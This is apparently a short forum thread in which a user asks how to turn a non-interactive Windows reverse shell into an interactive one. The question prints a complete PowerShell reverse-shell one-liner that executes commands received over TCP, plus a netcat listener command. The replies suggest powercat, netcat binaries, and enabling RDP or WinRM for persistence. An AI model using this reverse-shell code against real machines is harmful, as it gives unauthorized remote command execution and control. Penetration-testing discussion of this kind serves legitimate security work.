Promote shell to interactive shell on Windows

I have web shell that I managed to convert to reverse shell by running:
On Windows: $client = New-Object System.Net.Sockets.TCPClient(“”,80);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
On Kali: sudo rlwrap nc -nvlp 80

However this is non-interactive shell. Running
sc query or sc qc hangs the shell (luckily systeminfo and whoami /priv work).

What methods of upgrading “dump” shell to interactive shell exist on Windows?

did you try powercat? Copy over nc/64.exe and use it?

There are also wrappers for this. I don’t have personal experience using any of them but rlwrap is one and is also installable from apt.

Some of my team uses it.

If you have admin… my work around for unstable shell is to enable RDP.
Maybe winrm.

If not admin then abuse the above I guess.